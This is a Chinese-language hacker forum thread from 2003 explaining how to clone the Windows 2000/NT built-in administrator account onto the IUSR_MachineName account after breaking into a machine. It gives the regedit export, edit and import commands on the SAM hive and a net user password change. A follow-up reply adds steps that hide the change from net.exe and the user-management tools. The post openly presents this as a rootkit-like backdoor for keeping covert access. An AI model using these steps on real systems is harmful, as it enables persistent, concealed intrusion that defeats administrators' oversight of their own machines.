史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2003-11-09, 11:09 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 複製管理員帳號的方法

經常看到一些人在入侵一台Windows 2000或者Windows NT後堂而皇之地新增一個管理員組的用戶,似乎當管理員不存在一般,今天偶違背一下偶以前的初衷,Share一個類似於RootKit的玩藝,當然,這些程序也是可以用指令碼實現的,但是我就不寫了,OK,Show Time Now。

首先要讓大家知道的概念是在Windows 2000和Windows NT裡,預設管理員帳號的SID是類BIOS的500(0x1f4),那麼我們可以用機器裡已經存在的一個帳號將SID為500的帳號進行複製,在這裡我們選項的帳號是IUSR_MachineName(當然,為了加強隱蔽性,我們選項了這個帳號,所有用戶都可以用以下的方法,只不過這個用戶較一般罷了),測試環境為Windows 2000 Server。

執行一個System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然後在該CMD Shell裡面執行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
這樣我們將SID 為500的管理員帳號的相關資訊匯出,然後編輯adam.reg文件,將adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的'1F4'修改為IUSR_MachineName的SID(大部分的機器該用戶的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己新增了帳號後再安裝IIS就有可能不是這個值),將Root.reg文件中的'1F4'修改為'3E9'後執行
regedit /s adam.reg
匯入該Reg文件

然後執行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好)

OK,大功告成...

這樣,我們擁有和預設管理員一樣的桌面、一樣的Profile.....
而且,當我們執行 net localgroup administrators 時,看看結果:
C:\>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

再看看USER2SID的輸出結果:
C:\>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什麼密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登入...(沒有哪位大俠級的管理員喜歡經常修改IUSR_MachineName為其他的名字吧)

^_^,這算不算RootKit...

附:
1、感謝叮叮付出需要reinstall OS的代價...
2、任何用以上方法進行試驗所導致的系統無法使用均與偶無關,偶均不提供技術支持...

-----------------------------------------------------------------------------

叮叮 的補充完善

很多人提到使用了系統管理工具的用戶管理後,能夠發現IUSR_MachineName被提升了權限。
現給出解決辦法。

方法同上,不過這次修改內容多一些。即
這次要匯出兩個key內容:
一個是adam提到的
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
然後另外一個是你需要修改那個帳號的值
regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9

然後按照adam提到的修改adam.reg
「將adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的'1F4'修改為IUSR_MachineName的SID」

現在,你還要從iusr.reg文件中複製一下內容
就是將iusr.reg文件中「'V'=hex:0」開始一直到iusr.reg文件結束部分複製下來
然後替換掉adam.reg中同樣位置的部分

最後使用
regedit /s adam.reg
匯入該Reg文件
呵呵,別忘了給這個IUSR_MachineName改密碼哦。
hehe,ok,大功告成。
現在IUSR_MachineName帳號擁有了管理員的權限,但是你使用net.exe和
系統管理工具中的用戶管理都將看不到任何痕跡,即使你去察看所屬於的組和用戶。
都和修改前沒有任何區別。

好了,補充結束。
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 06:38 PM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1